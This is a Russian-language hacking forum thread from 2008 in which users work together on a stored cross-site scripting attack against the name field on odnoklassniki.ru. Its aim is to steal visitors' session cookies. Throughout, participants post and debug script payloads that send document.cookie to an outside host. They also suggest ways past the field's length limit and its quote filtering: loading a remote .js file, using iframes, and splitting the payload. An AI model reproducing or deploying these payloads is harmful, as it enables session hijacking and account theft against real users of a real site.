Просмотр полной версии : Итак наверно всем известно что на одноклассниках есть xss
andrey_a87
14.04.2008, 16:02
но вот что делать если не помещается мой скрипт в отведенное мне поле?
~Real F@ck!~
14.04.2008, 16:04
мы экстрасенсы ? хсс в студию
andrey_a87
14.04.2008, 16:12
<script>document.location='http://s.netsec.ru/andreya87.gif'+document.cookie</script>
~Real F@ck!~
14.04.2008, 16:15
http://s.netsec.ru/andreya87.gif
это как я понял твой скрипт, попробуй сделать переадресацию с другого сайта, что бы использовалось меньше символов в урл.
andrey_a87
14.04.2008, 16:16
например? всё равно не уместится...
А сколько символов ограничение? Вместо "document.location=", можно navigate('') попробовать. Короче получится.
andrey_a87
14.04.2008, 16:27
умещается только <script>document.location='http://s.netsec.ru/andr
andrey_a87
14.04.2008, 16:29
<script>navigate('http://s.netsec.ru/andreya87.gif и усё :cool:
~Real F@ck!~
14.04.2008, 16:30
как то можно обойти это ограничение, только я зобыл как, нужно кеша спросить
andrey_a87
14.04.2008, 16:38
мммм жаль....
GrAmOzEkA
14.04.2008, 16:49
Зарегь себе хост где нибуть и создай там *.js
document.location='http://s.netsec.ru/andreya87.gif'+document.cookie';
потом создай index.html с содержанием:
<script src="http://твой сайт/*.js"></script>
должно прокатить
А разбить на несколько запросов никак? Типа
<script>i="2"+document.cookie;/*
ТУТ ВСЯКАЯ ЛАБУДЕНЬ
*/alert(i);</script>
Ну, т.е. первым запросом шлёшь <script>i="2"+document.cookie;/*
вторым
*/alert(i);</script>
Basurman
14.04.2008, 16:53
<script src="http://megahackscript.ru/ploent.js"></script>
andrey_a87
14.04.2008, 16:54
как то можно обойти это ограничение, только я зобыл как, нужно кеша спросить
А можешь плиз у него спросить?
а сохранить страничку и ручками исправить ограничение поля на количество символов не прокатит?)) чё за хсс-то там..
andrey_a87
14.04.2008, 17:26
xss на имени весит...измените имя и поробуйте написать у себя на форуме...
andrey_a87
14.04.2008, 17:29
способ gramozeki не прокатывает,а способ на разбиение я считаю не уместным....может я не прав...
andrey_a87, ну ты попробуй :) А вообще то, что Basurman написал должно прокатить.
я делал фреймом , подсойденял скирипт, но всеравно, даже если оно и вместиться, то потом на форуме имя всеравно обрежут, тоесть для алерта места хватает, а для норм скрипта нет...
Игорь Михайлович
14.04.2008, 18:34
создай на сайте дж скрипт и скр его.
~Real F@ck!~
14.04.2008, 18:53
А можешь плиз у него спросить?
кеша щас нет в сети
~Real F@ck!~
14.04.2008, 18:54
а про инфрейм это правильная мысль
andrey_a87
14.04.2008, 19:32
а поподробнее можно про инфрейм, как это реализуется?
andrey_a87
15.04.2008, 10:55
ну в общем сделал скрипт поместил его в поле имени,захожу на свой форум пытаюсь написать сообщение и пропало поле ввода...подробнее об xss на odnoklassniki.ru можно прочитать http://video.antichat.ru/file259.html
скрипт выглядит вот так <script src="www.avlo.freevar.com/1.js"></script>
в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши:
alert("XSS");
и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал
andrey_a87
15.04.2008, 15:01
в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши:
alert("XSS");
и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал
Сделал как ты сказал,но алерт не вышел, но вот почему не знаю....вот в если в поле имени поставить <script>alert(/test/)</script> то алерт вылетает....мдяяяя дела...
andrey_a87
15.04.2008, 15:03
В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига....
andrey_a87
15.04.2008, 15:04
а протокол не умещается написать)))))
http://www.avlo.freevar.com/1.js
Пишет файл не найден, ты уверен что ты туда его положил?
BlackCats
15.04.2008, 15:15
хост дерьмовый, у него быввают заскоки.
В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига....
я же тебе сказал:
1. нужно прописывать протокол http://
2. кавычки как я понимаю там экранируются, не используй их
3. http://www.avlo.freevar.com/1.js не существует и вобще на этот сайт ругается
Зарегай страничку на народе как я тебе сказал
andrey_a87
15.04.2008, 15:43
зарегил на народе.... alvo150.narod.ru
index.html
______
<script src="http://www.alvo150.narod.ru/1.js"></script>
1.js
____
document.location='http://s.netsec.ru/andreya87.gif'+document.cookie';
Когда захожу на http://www.alvo150.narod.ru то не перекидывает меня на 1.js...
Просмотр исходного
<script src="http://www.alvo150.narod.ru/1.js"></script><!-- ><!-- "><!-- '><!-- --></textarea></form>
</title></comment></a>
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div>
<script language="JavaScript" src="http://yabs.yandex.ru/show/163"></script>
<!-- mailto:spm111@yandex.ru -->
document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;
andrey_a87
15.04.2008, 16:05
ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru
ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru
Да потому что он у тебя кривой
У тебя там написано:
document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie';
Убери апостроф после "document.cookie".
Сделай так:
document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;
З.Ы.
Да и вообще, лучше взять в привычку - перед тем как тестировать что либо удалённо, проверить скрипты на локальной тачке.
выдал такую ошибку :
500 Servlet Exception
one.ejb.control.client.ControllerFailureException: Can not obtain allowed
EJB service provider.
at one.app.community.dk.model.AWebModel.get(AWebModel .java:536)
at one.app.community.dk.model.AWebModel.handleEvent(A WebModel.java:464)
at one.app.community.dk.model.AWebModel.performLogin( AWebModel.java:298)
at one.app.community.dk.model.AWebModel.performLoginU ser(AWebModel.java:286)
at one.app.community.dk.servlet.DesktopServlet.handle NotLoginnedException(DesktopServlet.java:264)
at one.app.community.dk.servlet.DesktopServlet.doPost (DesktopServlet.java:128)
at one.app.community.dk.servlet.DesktopServlet.doGet( DesktopServlet.java:60)
at javax.servlet.http.HttpServlet.service(HttpServlet .java:126)
at javax.servlet.http.HttpServlet.service(HttpServlet .java:103)
at com.caucho.server.http.FilterChainServlet.doFilter (FilterChainServlet.java:96)
at one.app.community.filter.BufferingFilter.doFilter( BufferingFilter.java:85)
at com.caucho.server.http.FilterChainFilter.doFilter( FilterChainFilter.java:88)
at com.caucho.http.filter.GzipFilter.doFilter(GzipFil ter.java:128)
at com.caucho.server.http.FilterChainFilter.doFilter( FilterChainFilter.java:88)
at com.caucho.server.http.Invocation.service(Invocati on.java:315)
at com.caucho.server.http.HttpRequest.handleRequest(H ttpRequest.java:253)
at com.caucho.server.http.HttpRequest.handleConnectio n(HttpRequest.java:170)
at com.caucho.server.TcpConnection.run(TcpConnection. java:139)
at java.lang.Thread.run(Thread.java:619)
Resin 2.1.16 (built Tue Feb 15 11:12:27 PST 2005)
без разрывов.
мб кому-то поможет
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot